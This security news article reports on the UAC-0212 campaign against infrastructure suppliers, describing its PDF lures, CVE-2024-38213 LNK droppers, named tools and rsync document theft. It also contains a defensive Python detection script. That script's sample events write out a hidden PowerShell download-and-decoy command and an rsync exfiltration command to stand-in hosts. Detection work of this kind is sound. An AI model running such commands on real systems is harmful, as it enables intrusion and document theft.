
UAC-0212: Hackers Unleash Devastating Cyber Attack on Critical Infrastructure

In a recent escalation of cyber threats, hackers have launched a targeted campaign, identified as UAC-0212, aimed at compromising critical infrastructure facilities in Ukraine.

This campaign, which began in the second half of 2024, involves sophisticated tactics to infiltrate the networks of developers and suppliers of automation and process control solutions.

The attackers’ ultimate goal is to disrupt the information and communication systems (ICS) of enterprises in vital sectors such as energy, water, and heat supply.


The UAC-0212 campaign is notable for its use of novel techniques, including the distribution of PDF documents containing malicious links.

These links exploit the CVE-2024-38213 vulnerability, leading to the download of an LNK file.

Figure: example of the attack chain.

Once executed, this file triggers a PowerShell command that displays a decoy document while secretly downloading and installing malicious EXE/DLL files.

Tools like SECONDBEST, EMPIREPAST, SPARK, and CROOKBAG have been identified as part of this operation.

Additionally, RSYNC is used for long-term document theft, highlighting the attackers’ intent to gather sensitive information.
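The chain described above (a user-launched LNK spawning a hidden PowerShell that opens a decoy and downloads a payload, followed by rsync copying documents to a remote host) can be turned into process-creation detection logic. The following Python is an added example written for this page, not CERT-UA's or the article's own code; the event records are constructed Sysmon-style samples with placeholder paths and TEST-NET addresses, and the field names are an assumption.

```python
import re
from typing import Iterable

# Heuristics for the reported chain: Explorer (i.e. a double-clicked shortcut) starts
# PowerShell with a hidden window and a download cmdlet, optionally opening a decoy
# document; later, rsync is run against a remote daemon or ssh-style destination.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD_CMDLET = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.IGNORECASE)
DECOY_OPEN = re.compile(r"Start-Process\s+\S*\.(?:pdf|docx?)", re.IGNORECASE)
RSYNC_REMOTE = re.compile(r"\S+::\S+|\S+@\S+:\S+")  # host::module or user@host:path targets


def classify(event: dict) -> list[str]:
    """Return the detection labels that apply to one process-creation event."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    labels = []
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe"):
        # Explorer rarely launches PowerShell except via a shortcut; hidden window plus a
        # download cmdlet is the decoy-and-dropper pattern the article describes.
        if HIDDEN_WINDOW.search(cmd) and DOWNLOAD_CMDLET.search(cmd):
            labels.append("lnk-powershell-dropper")
        if DECOY_OPEN.search(cmd):
            labels.append("decoy-document-opened")
    if image.endswith("rsync.exe") and RSYNC_REMOTE.search(cmd):
        labels.append("rsync-to-remote-host")
    return labels


def scan(events: Iterable[dict]) -> dict[int, list[str]]:
    """Map event index -> labels for every event that matched at least one heuristic."""
    return {i: hits for i, ev in enumerate(events) if (hits := classify(ev))}


# Constructed sample telemetry (not real indicators from the campaign).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -w hidden -c Start-Process C:\Users\u\Downloads\offer.pdf; "
                r"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.dll','C:\ProgramData\x.dll')"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign scheduled script
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
    {"image": r"C:\Tools\rsync.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "rsync -az C:/Users/u/Documents/ user@203.0.113.5::docs"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The heuristics are deliberately narrow (parent-child relationship plus command-line features) so that routine administrative PowerShell, as in the second sample, does not fire.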

The geography of the attack is extensive, with targets including companies from Serbia, the Czech Republic, and Ukraine.

Between July 2024 and February 2025, multiple logistics and equipment manufacturing companies were compromised.

The attackers often pose as potential customers, engaging in correspondence with victims over several days to gain trust before sending malicious documents.

Once inside, the attackers move quickly through the network, establishing persistence on servers and workstations within hours of the initial compromise.

Impact and Response

The UAC-0212 campaign underscores the increasing threat to critical infrastructure worldwide.

Given the attackers’ ability to rapidly spread through networks, simply identifying and reinstalling affected systems is insufficient.

CERT-UA urges supplier companies to contact them for comprehensive technical investigations and incident response measures.

The agency provides cyber threat indicators and encourages vigilance among enterprises that may have been targeted.

As the threat landscape evolves, it is crucial for organizations to enhance their cybersecurity posture, particularly those involved in critical infrastructure.

The use of advanced threat detection tools and regular network audits can help mitigate such attacks.

The ongoing nature of these cyber operations highlights the need for continuous monitoring and collaboration between cybersecurity entities to counter emerging threats effectively.


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
